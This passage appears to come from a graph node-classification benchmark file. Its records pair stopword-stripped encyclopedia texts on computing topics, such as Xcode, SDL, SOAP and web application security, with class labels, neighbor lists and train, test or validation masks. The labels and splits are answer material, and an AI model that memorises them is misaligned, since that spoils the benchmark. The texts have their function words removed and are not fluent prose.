    "text": "Xcode:xcode xcode integrated development environment ide macos containing suite software development tools developed apple developing software macos ios ipados watchos tvos first released 2003 latest stable release version 10.3 available via mac app store free charge macos mojave users registered developers download preview releases prior versions suite apple developer website xcode supports source code programming languages c c++ objective-c objective-c++ java applescript python ruby resedit rez swift variety programming models including limited cocoa carbon java third parties added support gnu pascal free pascal ada c perl d. xcode build fat binary files containing code multiple architectures mach-o executable format called universal binary files allow software run powerpc intel-based x86 platforms include 32-bit 64-bit code architectures using ios sdk xcode also used compile debug applications ios run arm architecture processors xcode includes gui tool instruments runs atop dynamic tracing framework dtrace created sun microsystems released part opensolaris main application suite integrated development environment ide also named xcode xcode suite includes apple developer documentation built-in interface builder application used construct graphical user interfaces xcode 4.1 xcode suite included modified version gnu compiler collection xcode 3.1 xcode 4.6.3 included llvm-gcc compiler front ends gnu compiler collection code generator based llvm xcode 3.2 later included clang c/c++/objective-c compiler newly-written front ends code generator based llvm clang static analyzer starting xcode 4.2 clang compiler became default compiler starting xcode 5.0 clang compiler provided xcode 4.6.3 xcode suite used gnu debugger gdb back-end ide debugger starting xcode 4.3 lldb debugger also provided starting xcode 4.5 lldb replaced gdb default back-end ide debugger starting xcode 5.0 gdb longer supplied formerly xcode supported distributing product build process multiple systems one technology involved named shared workgroup build used bonjour protocol automatically discover systems providing compiler services modified version free software product distcc facilitate distribution workloads earlier versions xcode provided system named dedicated network builds features absent supported versions xcode xcode also includes apple webobjects tools frameworks building java web applications web services formerly sold separate product xcode 3.0 apple dropped webobjects development inside xcode wolips used instead xcode 3 still includes webobjects frameworks xcode 1.0 released fall 2003 xcode 1.0 based project builder updated user interface ui zerolink fix continue distributed build support code sense indexing next significant release xcode 1.5 better code completion improved debugger xcode 2.0 released mac os x v10.4 tiger included quartz composer visual programming language better code sense indexing java ant support also included apple reference library tool allows searching reading online documentation apple website documentation installed local computer xcode 2.1 could create universal binary files supported shared precompiled headers unit testing targets conditional breakpoints watchpoints also better dependency analysis final version xcode mac os x v10.4 2.5 xcode 3.0 released mac os x v10.5 leopard notable changes since 2.1 include dtrace debugging tool named instruments refactoring support context-sensitive documentation objective-c 2.0 garbage collection also supports project snapshots provide basic form version control message bubbles show build errors debug values alongside code building four-architecture fat binaries 32 64-bit intel powerpc xcode 3.1 update release developer tools mac os x version included iphone sdk could target non-mac os x platforms including iphone os 2.0 included gcc 4.2 llvm gcc 4.2 compilers another new feature since xcode 3.0 xcode scm support includes subversion 1.5 xcode 3.2 released mac os x v10.6 snow leopard installs earlier version os x supports static program analysis among features also drops official support targeting versions earlier iphone os 3.0 still possible target older versions simulator supports iphone os 2.0 3.1 also java support exiled 3.2 organizer xcode 3.2.6 last version downloaded free users mac os x v10.6 downloading requires free registration apple developer site june 2010 apple worldwide developers conference version 4 xcode announced developer tools state union address version 4 developer tools consolidates xcode editing tools interface builder one application among enhancements apple released final version xcode 4.0 march 9 2011 software made available free registered members 99 per year mac developer program 99 per year ios developer program also sold 4.99 non-members mac app store longer available xcode 4.0 drops support many older systems including powerpc development software development kits sdks mac os x 10.4 10.5 ios sdks older 4.3 deployment target still set produce binaries older platforms mac os platforms one limited creating x86 x86-64 binaries later xcode free general public version 4.1 xcode cost 4.99 xcode 4.1 made available free july 20 2011 day mac os x lion release users mac os x lion mac app store august 29 2011 xcode 4.1 made available mac os x snow leopard members paid mac ios developer programs xcode 4.1 last version include gnu compiler collection gcc instead llvm gcc clang october 12 2011 xcode 4.2 released concurrently release ios 5.0 included many improved features storyboarding automatic reference counting arc xcode 4.2 last version support mac os x 10.6 snow leopard available registered developers paid accounts without paid account 3.2.6 latest download appears snow leopard xcode 4.3 released february 16 2012 distributed one application bundle xcode.app installed mac app store xcode 4.3 reorganizes xcode menu include development tools xcode 4.3.1 released march 7 2012 add support ios 5.1 xcode 4.3.2 released march 22 2012 enhancements ios simulator suggested move lldb debugger versus gdb debugger appear undocumented changes xcode 4.3.3 released may 2012 featured updated sdk mac os x 10.7.4 lion bug fixes xcode 4.4 released july 25 2012 runs mac os x lion 10.7 os x mountain lion 10.8 first version xcode contain os x 10.8 mountain lion sdk xcode 4.4 includes support automatic synthesizing declared properties new objective-c features literal syntax subscripting improved localization august 7 2012 xcode 4.4.1 released bug fixes september 19 2012 ios 6 xcode 4.5 released xcode added support ios 6 4-inch retina display iphone 5 ipod touch 5th generation also brought new objective-c features ios simplified localization added auto-layout support ios october 3 2012 xcode 4.5.1 released bug fixes stability improvements less month later xcode 4.5.2 released support ipad mini ipad retina display bug fixes stability improvements january 28 2013 ios 6.1 xcode 4.6 released june 2013 apple worldwide developers conference version 5 xcode announced september 18 2013 xcode 5.0 released added support ios 7 sdk always support os x 10.8 mountain lion sdk support os x 10.9 mavericks sdk latest included betas version also added version clang generating 64-bit arm code ios 7 apple removed support building garbage collected cocoa binaries xcode 5.1 june 2 2014 worldwide developers conference apple announced version 6 xcode one notable features support swift all-new programming language developed apple xcode 6 also included features like playgrounds live debugging tools september 17 2014 time ios xcode 6 released xcode could downloaded mac app store june 8 2015 apple worldwide developers conference xcode version 7 announced introduced support swift 2 metal os x added support deploying ios devices without apple developer license xcode 7 released september 16 2015 june 13 2016 apple worldwide developers conference xcode version 8 announced introduced support swift 3 xcode 8 released september 13 2016 june 5 2017 apple worldwide developers conference xcode version 9 announced introduced support swift 4 metal 2 also introduced remotely debugging ios tvos devices wirelessly wifi xcode 9 publicly released september 19 2017 june 4 2018 apple worldwide developers conference xcode version 10 announced beta version released day xcode 10 introduced support dark mode announced macos mojave collaboration platforms bitbucket gitlab addition github training machine learning models playgrounds new features swift 4.2 metal 2.1 well improvements editor project build system xcode 10 also dropped support building 32-bit macos apps longer supports subversion integration xcode 10 publicly released september 17 2018 june 3 2019 apple worldwide developers conference xcode version 11 announced beta version released day xcode 11 introduced support new features swift 5.1 well new swiftui framework although interactive ui tools available running macos 10.15 also supports building ipad applications run macos includes integrated support swift package manager contains improvements editor including minimap gives overview source code file quick navigation xcode 11 requires macos 10.14.4 later",
    "neighbors": [
      10755,
      6154,
      1549,
      4111,
      7697,
      541,
      9245,
      5663,
      3107,
      6186,
      5165,
      5677,
      8754,
      9784,
      576,
      5696,
      8262,
      4171,
      6731,
      1623,
      3681,
      11363,
      2149,
      3691,
      8303,
      8304,
      5747,
      6264,
      7292,
      7806,
      10878,
      1666,
      1668,
      9354,
      5784,
      10406,
      11430,
      171,
      3248,
      1715,
      7355,
      10432,
      6338,
      5833,
      7378,
      213,
      3286,
      10470,
      231,
      4844,
      5356,
      9964,
      11506,
      11513,
      6910,
      2304,
      8701,
      2819,
      784,
      10512,
      1299,
      4885,
      807,
      3881,
      3371,
      303,
      4399,
      7983,
      4406,
      7991,
      2363,
      2365,
      2366,
      7486,
      11584,
      11589,
      8524,
      847,
      9063,
      4457,
      8554,
      3948,
      10608,
      9589,
      8582,
      6023,
      6539,
      428,
      446,
      7614,
      9665,
      8644,
      456,
      11221,
      4571,
      7133,
      3038,
      499,
      5619,
      8700,
      2045,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 10479,
    "label": 4,
    "text": "Norton_System_Insight:norton system insight norton system insight part performance monitoring system found norton 2010–2012 lines monitors displays information downloaded files installed applications scans detected security risks also shows number performance alerts addition represents cpu memory usage 30 days graphical way easier understanding provides links norton insight startup manager optimize button defragments system drive system insight launched click performance link",
    "neighbors": [
      10872,
      9569,
      8398
    ],
    "mask": "Test"
  },
  {
    "node_id": 10480,
    "label": 2,
    "text": "Simple_DirectMedia_Layer:simple directmedia layer simple directmedia layer sdl cross-platform software development library designed provide hardware abstraction layer computer multimedia hardware components software developers use write high-performance computer games multimedia applications run many operating systems android ios linux macos windows sdl manages video audio input devices cd-rom threads shared object loading networking timers 3d graphics handle opengl vulkan direct3d context common misconception sdl game engine true however library suited building games directly usable indirectly engines built top library internally written c possibly depending target platform c++ objective-c provides application programming interface c bindings languages available free open-source software subject requirements zlib license since version 2.0 prior versions subject gnu lesser general public license zlib license sdl 2.0 freely available static linking closed-source projects unlike sdl 1.2 sdl extensively used industry large small projects 700 games 180 applications 120 demos posted library website sam lantinga created library first releasing early 1998 working loki software got idea porting windows application macintosh used sdl port doom beos see doom source ports several free libraries developed work alongside sdl smpeg openal also founded galaxy gameworks 2008 help commercially support sdl although company plans currently hold due time constraints soon putting galaxy gameworks hold lantinga announced sdl 1.3 would later become sdl 2.0 would licensed zlib license lantinga announced sdl 2.0 14 july 2012 time announcing joining valve corporation first version announced day joined company lantinga announced stable release sdl 2.0.0 13 august 2013 sdl 2.0 major update sdl 1.2 codebase different backwards-compatible api replaces several parts 1.2 api general support multiple input output options feature additions include multiple window support hardware-accelerated 2d graphics better unicode support support mir wayland added sdl 2.0.2 enabled default sdl 2.0.4 version 2.0.4 also provided better support android sdl wrapper around operating-system-specific functions game needs access purpose sdl provide common framework accessing functions multiple operating systems cross-platform sdl provides support 2d pixel operations sound file access event handling timing threading often used complement opengl setting graphical output providing mouse keyboard input since opengl comprises rendering game using simple directmedia layer automatically run every operating system adaptations must applied reduced minimum since sdl also contains abstraction apis frequent functions offered operating system syntax sdl function-based operations done sdl done passing parameters subroutines functions special structures also used store specific information sdl needs handle sdl functions categorized several different subsystems sdl divided several subsystems besides basic low-level support also separate official libraries provide functions comprise standard library provided official website included official documentation non-standard libraries also exist example sdl_collide sourceforge created amir taaki sdl 2.0 library language bindings way sdl designed much source code split separate modules operating system make calls underlying system sdl compiled appropriate modules selected target system following back-ends available sdl 1.2 support risc os dropped 2.0 unofficial sixel back-end available sdl 1.2 rockbox mp3 player firmware also distributes version sdl 1.2 used run games quake years sdl used many commercial non-commercial video game projects instance mobygames listed 120 games using sdl 2013 sdl website listed around 700 games 2012 important commercial examples angry birds unreal tournament ones open-source domain openttd battle wesnoth freeciv cross-platform game releases popular humble indie bundles linux mac android often sdl based sdl also often used later ports new platforms legacy code instance pc game homeworld ported pandora handheld jagged alliance 2 android via sdl also several non video game software uses sdl examples emulators dosbox visualboyadvance several books written development sdl see readings sdl used university courses teaching multimedia computer science instance workshop game programming using libsdl university cadiz 2010 game design discipline utfpr ponta grossa campus 2015",
    "neighbors": [
      1666,
      9604,
      9605,
      8454,
      136,
      2186,
      6797,
      2062,
      9491,
      3734,
      2583,
      4758,
      5754,
      1435,
      10654,
      10016,
      3491,
      3876,
      6180,
      10149,
      9128,
      4777,
      2730,
      2603,
      428,
      5165,
      8618,
      7983,
      8116,
      823,
      1849,
      11322,
      6718,
      2368,
      1347,
      1348,
      8771,
      4550,
      5451,
      8524,
      7629,
      2769,
      7889,
      11602,
      9045,
      4182,
      4822,
      10841,
      9434,
      1501,
      9054,
      1632,
      482,
      2658,
      3939,
      4836,
      10470,
      8554,
      9579,
      5612,
      5743,
      8303,
      8304,
      10739,
      2676,
      2804,
      8438,
      9848,
      1530,
      2045,
      6910,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 10481,
    "label": 3,
    "text": "Mac_NC:mac nc mac nc sometimes referred macintosh nc network thin client expected released apple april 1998 device widely promoted then-apple director larry ellison apparently part oracle network computer initiative mac nc ultimately never released although key components technology inherited original imac released august 1998 may 21 1996 oracle corporation along 30 hardware software vendors announced intent build computers designed around network computer platform idea design technology based profile included diskless computers commonly coded applications using languages java interface internet using common software netscape navigator may 1996 apple became partner network computing effort used apple pippin platform implementation july 9 1997 gil amelio ousted ceo apple board directors steve jobs stepped interim ceo begin critical restructuring company product line would eventually become ceo served position august 2011 oracle corporation ceo apple board member larry ellison announced december 1997 talking harvard computer society apple would release product called macintosh nc april 1998 suggested network computer would near-300 mhz processor 17-inch screen would sell less us 1,000 hard disk drive available extra costing additional 100 steve jobs agree stating unfortunately ellison pretty far base e-mail maybe trying deflect interest really oracle ellison overseen development business alliance produced number network computer-branded devices companies sun ibm apple never manufactured devices oracle alliance endorse network computer reference profile steve jobs already stopped macintosh clone efforts would shut apple pippin concept prospects mac nc ultimately technology shipped netboot release mac os x server 1.0 january 1999",
    "neighbors": [
      9732,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      5677,
      8253,
      1090,
      4679,
      8783,
      4180,
      10325,
      10838,
      10840,
      9312,
      9826,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      10926,
      2735,
      4283,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      2282,
      1772,
      3324,
      5375,
      1290,
      3338,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      4399,
      11066,
      9022,
      1346,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 10482,
    "label": 2,
    "text": "Xenomai:xenomai xenomai real-time development framework cooperating linux kernel provide pervasive interface-agnostic hard real-time support user space applications seamlessly integrated linux environment xenomai project launched august 2001 2003 merged real-time application interface rtai project produce production-grade real-time free software platform linux called rtai/fusion top xenomai abstract real-time operating system rtos core eventually rtai/fusion effort became independent rtai 2005 xenomai project xenomai based abstract rtos core usable building kind real-time interface nucleus exports set generic rtos services number rtos personalities called “ skins ” built nucleus providing specific interface applications using services single generic core implement long list differences xenomai rtai though projects share ideas support rtdm layer major differences derive goals projects aim respective implementation rtai focused lowest technically feasible latencies xenomai also considers clean extensibility rtos skins portability maintainability important goals xenomai path towards ingo molnár preempt_rt support another major difference compared rtai objectives",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      6207,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      5220,
      6244,
      1126,
      5222,
      10856,
      4207,
      11383,
      5244,
      4734,
      11391,
      10883,
      6276,
      7812,
      7821,
      4238,
      10382,
      2195,
      9366,
      2711,
      6808,
      2201,
      7319,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1221,
      9927,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      1253,
      2278,
      233,
      7403,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      10030,
      823,
      6968,
      7992,
      318,
      321,
      10561,
      3911,
      6985,
      6988,
      10063,
      341,
      5975,
      11095,
      10590,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      9628,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      1462,
      5049,
      9667,
      457,
      9162,
      6624,
      6625,
      2529,
      5603,
      8676,
      2021,
      1513,
      3055,
      5105,
      499,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 10483,
    "label": 3,
    "text": "FeiTeng_(processor):feiteng processor feiteng 飞腾 fēiténg name several computer central processing units designed produced china supercomputing applications microprocessors developed tianjin phytium technology processors also described yinhefeiteng 银河飞騰 yhft family cpu family developed team directed nudt professor xing zuocheng first generation binary compatible intel itanium 2 second generation ft64 system chip cpu 64-bit stream processor ft64 chips used yinhe 银河 supercomputers accelerators feiteng-1000 third generation cpu family manufactured 65 nm technology contains 350 million gates clock frequency 0.8–1 ghz compatible sparcv9 instruction set architecture chip contains 8 cores capable executing 64 threads 3 hypertransport channels coherent links 4 ddr3 memory controllers 8x pcie 2.0 link tianhe-1a supercomputer uses 2,048 feiteng 1000 processors tianhe-1a theoretical peak performance 4.701 petaflops also employing 7,168 nvidia tesla m2050 gpus 14,336 intel xeon x5670 cpus addition ft1000 processors feiteng-1000 eight-core processor based sparc system used operate service nodes tianhe-1 2012 report european high performance computing service stated feiteng used work opensparc project tianhe-2 supercomputer uses 4096 processors galaxy ft-1500 16 cores opensparc architecture based 65 w tdp made 40 nm technology processor cores work 1.8 ghz peak performance ft-1500 115–144 gflops every core may execute 8 interleaving threads supports 256-bit wide simd vector operations including fused mul-add fma cache soc works 2 ghz frequency 16 kb l1i 16 kb l1d 512 kb l2 per core shared 4 mb l3 cache l3 cache 4 segments 1 segment per block 4 cpu cores 1 mb 32-way associative cache uses directory-based cache coherency protocol ft-1500 also ft-1500a arm64 soc designed phytium includes 16 cores armv8 processor 32-lane pcie host 2 gmac on-chip ethernet controller gicv3 interrupt controller support",
    "neighbors": [
      11618,
      10789,
      1480,
      5358,
      1776,
      8508,
      1399,
      2394,
      508,
      11487
    ],
    "mask": "Train"
  },
  {
    "node_id": 10484,
    "label": 5,
    "text": "Rdate:rdate unix-like operating systems rdate tool querying current time network server optionally setting system time rdate uses time protocol time protocol generally considered obsolete replaced network time protocol ntp used set local system time rdate operates changing system time immediately time date returned server abrupt changes clock settings found cause problems software relying timing led development network time protocol gradually changes system time skip ticks due problems described rdate generally used systems ntp available specialized circumstances required system time set correctly soon possible initial setup services may vulnerable abrupt time-changes started",
    "neighbors": [
      515,
      9733,
      9735,
      3976,
      4750,
      5397,
      2198,
      6812,
      7847,
      4398,
      823,
      1336,
      7356,
      965,
      8522,
      3659,
      9557,
      9946,
      6120,
      10344,
      4850,
      5492,
      9204,
      6138,
      891,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 10485,
    "label": 3,
    "text": "Microsequencer:microsequencer computer architecture engineering sequencer microsequencer generates addresses used step microprogram control store used part control unit cpu stand-alone generator address ranges usually addresses generated combination counter field microinstruction subset instruction register counter used typical case next microinstruction one execute field microinstruction used jumps logic since cpus implement instruction set useful able decode instruction bits directly sequencer select set microinstructions perform cpu instructions modern cisc processors use combination pipelined logic process lower complexity opcodes completed one clock cycle microcode implement ones take multiple clock cycles complete one first integrated microcoded processors ibm palm processor emulated processor instruction microcode used ibm 5100 one first personal computers recent examples similar microsequencer-based processors microcore labs mcl86 mcl51 mcl65 cores emulate intel 8086/8088 8051 mos 6502 instruction sets entirely microcode",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      2638,
      3175,
      8815,
      6268,
      3197,
      4742,
      7313,
      6815,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      2805,
      249,
      1798,
      1801,
      6926,
      6415,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      8514,
      4423,
      7505,
      9044,
      344,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      3470,
      5518,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      4030,
      453,
      466,
      1499,
      7134,
      5090,
      995,
      7653,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 10486,
    "label": 5,
    "text": "SOAP:soap soap abbreviation simple object access protocol messaging protocol specification exchanging structured information implementation web services computer networks purpose provide extensibility neutrality independence uses xml information set message format relies application layer protocols often hypertext transfer protocol http simple mail transfer protocol smtp message negotiation transmission soap allows processes running disparate operating systems windows linux communicate using extensible markup language xml since web protocols like http installed running operating systems soap allows clients invoke web services receive responses independent language platforms soap provides messaging protocol layer web services protocol stack web services xml-based protocol consisting three parts soap three major characteristics example soap procedures application send soap request server web services enabled—such real-estate price database—with parameters search server returns soap response xml-formatted document resulting data e.g. prices location features since generated data comes standardized machine-parsable format requesting application integrate directly soap architecture consists several layers specifications soap evolved successor xml-rpc though borrows transport interaction neutrality web service addressing envelope/header/body elsewhere probably wddx soap designed object-access protocol 1998 dave winer box bob atkinson mohsen al-ghosein microsoft atkinson al-ghosein working specification made available submitted ietf 13 september 1999 according box due politics within microsoft microsoft hesitation dave winer shipped xml-rpc 1998 submitted internet draft reach rfc status therefore considered standard version 1.1 specification published w3c note 8 may 2000 since version 1.1 reach w3c recommendation status considered standard either version 1.2 specification however became w3c recommendation june 24 2003 soap specification maintained xml protocol working group world wide web consortium group closed 10 july 2009 soap originally stood simple object access protocol version 1.2 standard dropped acronym soap first introduced became underlying layer complex set web services based web services description language wsdl xml schema universal description discovery integration uddi different services especially uddi proved far less interest appreciation gives complete understanding expected role soap compared web services actually evolved soap specification broadly defined consisting following 3 conceptual components protocol concepts encapsulation concepts network concepts soap specification defines messaging framework consists soap message ordinary xml document containing following elements smtp http valid application layer protocols used transport soap http gained wider acceptance works well today internet infrastructure specifically http works well network firewalls soap may also used https protocol http application level uses encrypted transport protocol underneath either simple mutual authentication advocated ws-i method provide web service security stated ws-i basic profile 1.1 major advantage distributed protocols like giop/iiop dcom normally filtered firewalls soap amqp yet another possibility implementations support soap also advantage dcom unaffected security rights configured machines require knowledge transmitting receiving nodes lets soap loosely coupled way possible dcom also soap-over-udp oasis standard xml information set chosen standard message format widespread use major corporations open source development efforts typically xml information set serialized xml wide variety freely available tools significantly eases transition soap-based implementation somewhat lengthy syntax xml benefit drawback promotes readability humans facilitates error detection avoids interoperability problems byte-order endianness slow processing speed cumbersome example corba giop ice dcom use much shorter binary message formats hand hardware appliances available accelerate processing xml messages binary xml also explored means streamlining throughput requirements xml xml messages self-documenting nature usually 'overhead headers footers nested tags delimiters actual data contrast earlier protocols overhead usually relatively small percentage overall message financial messaging soap found result 2–4 times larger message previous protocols fix financial information exchange cdr common data representation xml information set serialized xml instance csv json xml-infoset representations exist also need specify generic transformation framework concept soap bindings allows specific bindings specific application drawback senders receivers support newly defined binding post /instock http/1.1 host www.example.org content-type application/soap+xml charset=utf-8 content-length 299 soapaction http //www.w3.org/2003/05/soap-envelope xml version= 1.0 soap envelope xmlns soap= http //www.w3.org/2003/05/soap-envelope xmlns m= http //www.example.org /soap envelope",
    "neighbors": [
      7690,
      4107,
      6688,
      6694,
      10791,
      11303,
      5677,
      8751,
      1586,
      1079,
      3131,
      8766,
      5700,
      10313,
      10829,
      7765,
      1128,
      7784,
      9834,
      4213,
      6775,
      1657,
      124,
      4740,
      6284,
      6797,
      148,
      6805,
      7320,
      10910,
      160,
      1185,
      4768,
      4771,
      4778,
      10924,
      2221,
      2222,
      4788,
      9909,
      4797,
      7878,
      6353,
      211,
      8923,
      736,
      8929,
      1250,
      9441,
      8425,
      2296,
      11515,
      5372,
      6398,
      3839,
      769,
      2818,
      7943,
      1808,
      5907,
      5915,
      7455,
      11040,
      9505,
      10020,
      11556,
      7974,
      10024,
      4397,
      3894,
      823,
      10553,
      1851,
      317,
      3909,
      5449,
      3920,
      6993,
      6483,
      2390,
      6487,
      348,
      11105,
      10090,
      5996,
      4974,
      4979,
      5492,
      10611,
      11650,
      8070,
      2441,
      8080,
      2971,
      4507,
      6555,
      9124,
      5029,
      7592,
      6060,
      10159,
      9138,
      5048,
      9144,
      3517,
      10193,
      467,
      479,
      6628,
      5093,
      3558,
      6629,
      489,
      4589,
      6127,
      502
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10487,
    "label": 4,
    "text": "Messaging_Architects:messaging architects messaging architects canadian software company specializing e-mail products flagship product netmail integrated email management platform launched march 1995 chronofax company distributor computer-based fax solutions chronofax became tobit software north america result partnership german company called tobit produced fax software novell netware groupwise markets three-and-a-half-year partnership tobit came close company renamed messaging architects messaging architects initially provided add-ons novell groupwise messaging platform company offers integrated email management platform called netmail netmail consolidates company portfolio email software solutions includes netmail secure formerly gwguardian m+guardian netmail archive formerly m+archive netmail search netmail migrate formerly migrator netmail store formerly m+securestore company also provides email platform migration services messaging architects also highly skilled professional services team full novell microsoft exchange certification messaging architects works messaging platform providers provide solutions microsoft exchange novell groupwise lotus notes late 2008 mark crispin inventor imap worked messaging architects senior software engineer developing entirely new imap server based upon distributed mail store extending mix format messaging architects email security email archiving solutions positioned gartner magic quadrant reports 2009 m+archive positioned magic quadrant email active archiving 2009 m+guardian email security solution achieve one gold two vbspam platinum awards virus bulletin anti-spam certification messaging architects also offers range remote on-site services managing email risk co-existence different email platforms including professional services email migration services email consulting email policy training",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 10488,
    "label": 9,
    "text": "RAPID:rapid rapid high-level programming language used control abb industrial robots rapid introduced along s4 control system 1994 abb superseding arla programming language features language include",
    "neighbors": [
      4466,
      2045,
      9330
    ],
    "mask": "None"
  },
  {
    "node_id": 10489,
    "label": 6,
    "text": "RichCopy:richcopy richcopy discontinued file copy utility program developed ken tamaru microsoft corporation multi-threaded may thus circumstances copy files faster utilities available windows operating system additionally similarities like multithreaded copying microsoft utility robocopy provides complete graphical user interface gui whereas robocopy command-line utility although gui interfaces robocopy richcopy copy files opened certain combinations file sharing attributes process may open files exclusive read access withholding file_share_read another company created non-free gs richcopy 360 copy open files developed",
    "neighbors": [
      2406,
      2568,
      4074,
      5482,
      7983,
      7088,
      10101,
      1750,
      7672,
      894
    ],
    "mask": "None"
  },
  {
    "node_id": 10490,
    "label": 4,
    "text": "SHRED:shred spam harassment reduction via economic disincentives shred proposed sender-at-risk e-mail stamp mechanism reducing e-mail spamming problem indirectly increasing cost e-mail sending senders unwanted e-mail aims avoid defects earlier sender-at-risk mechanisms main aim shred provide economic incentives legitimate isps clean botnet problem within networks making cheaper continue pay excess postage charges delivered spam messages whilst requiring shred mandated universally adopted effective smtp re-engineered shred differs e-mail postage stamp systems shred stamps represent potential financial liability e-mail sender rather unconditional cost incur replacement cost cancelled e-mail recipient considers e-mail unwanted shred thus effectively electronic reputation system reputation—in form able affix stamps e-mail—is lost complaints bought back money thus imposing financial cost loss reputation presence absence stamp used e-mail receivers together sources information blacklists whitelists content analysis make judgments whether e-mail relayed delivered",
    "neighbors": [
      4883,
      9909
    ],
    "mask": "Test"
  },
  {
    "node_id": 10491,
    "label": 2,
    "text": "NeXT_RISC_Workstation:next risc workstation next risc workstation nrw unreleased computer workstation designed next early 1990s successor m68k-based nextcube nextstation initially nrw based motorola 88110 microprocessor due lack confidence motorola commitment 88k architecture later redesigned around dual powerpc 601s pre-production motherboards enclosures produced nrw enter production next exited hardware market 1993",
    "neighbors": [
      8048,
      7806
    ],
    "mask": "Test"
  },
  {
    "node_id": 10492,
    "label": 4,
    "text": "Web_application_security:web application security web application security branch information security deals specifically security websites web applications web services high level web application security draws principles application security applies specifically internet web systems majority web application attacks occur cross-site scripting xss sql injection attacks typically made possible flawed coding failure sanitize application inputs outputs attacks ranked 2009 cwe/sans top 25 dangerous programming errors according security vendor cenzic top vulnerabilities march 2012 include open web application security project owasp provides free open resources led non-profit called owasp foundation owasp top 10 2017 published result recent research based comprehensive data compiled 40 partner organizations data approximately 2.3 million vulnerabilities discovered across 50,000 applications according owasp top 10 2017 ten critical web application security risks include secure web application development enhanced applying security checkpoints techniques early stages development well throughout software development lifecycle special emphasis applied coding phase development security mechanisms used include threat modeling risk analysis static analysis digital signature among others owasp emerging standards body web application security particular published owasp top 10 describes detail major threats web applications web application security consortium wasc created web hacking incident database whid also produced open source best practice documents web application security whid became owasp project february 2014 security fundamentally based people processes number technical solutions consider designing building testing secure web applications high level solutions include",
    "neighbors": [
      899,
      5636,
      6916,
      10756,
      1803,
      9356,
      3473,
      8978,
      3604,
      10392,
      5373,
      5246,
      4892,
      5404,
      2975,
      2084,
      2213,
      2470,
      8998,
      10020,
      939,
      10412,
      3629,
      9646,
      7855,
      1970,
      5682,
      7352,
      5433,
      571,
      3643,
      7739,
      3262,
      9791,
      1474,
      3525,
      2758,
      10437,
      7368,
      9160,
      331,
      9293,
      2262,
      9432,
      9688,
      7515,
      8668,
      1251,
      3941,
      4198,
      6373,
      7526,
      2409,
      107,
      11244,
      2926,
      113,
      119,
      2041,
      5245,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10493,
    "label": 3,
    "text": "Tile_processor:tile processor tile processors multicore manycore chips contain one-dimensional commonly two-dimensional arrays identical tiles tile comprises compute unit processing engine cpu caches switch tiles viewed adding switch core core comprises compute unit caches typical tile processor configuration switches tiles connected using one mesh networks tilera tile pro 64 example contains 64 tiles tiles comprises cpu l1 l2 caches switches several mesh networks processors tile configuration include seaforth24 kilocore kc256 xmos xcore microcontrollers massively parallel processor arrays",
    "neighbors": [
      4880,
      7699,
      10675
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10494,
    "label": 2,
    "text": "Robotics_middleware:robotics middleware robotics middleware middleware used complex robot control software systems described software glue make easier robot builders focus specific problem area wide variety projects robotics middleware exist one dominates fact many robotic systems use middleware middleware products rely wide range different standards technologies approaches make use interoperation difficult developers may prefer integrate system player project formerly player/stage project project create free software research robotics sensor systems components include player network server stage robot platform simulators although accurate statistics hard obtain player one popular open-source robot interfaces research post-secondary education major intelligent robotics journals conferences regularly publish papers featuring real simulated robot experiments using player stage rt-middleware common platform standards robots based distributed object technology rt-middleware supports construction various networked robotic systems integration various network-enabled robotic elements called rt-components specification standard rt-components discussed defined object management group omg urbi open source cross-platform software platform c++ used develop applications robotics complex systems based uobject distributed c++ component architecture also includes urbiscript orchestration language parallel event-driven script language uobject components plugged urbiscript appear native objects scripted specify interactions data exchanges uobjects linked urbiscript interpreter executed autonomous processes remote mode either another thread another process machine local network machine distant network miro distributed object oriented framework mobile robot control based corba common object request broker architecture technology miro core components developed aid ace adaptive communications environment object oriented multi-platform framework os-independent interprocess network real time communication use tao ace orb orb object request broker corba implementation designed high performance real time applications currently supported platforms include pioneers b21 robot soccer robots various robotic sensors orca describes goals also state successful think framework objectives must general flexible extensible 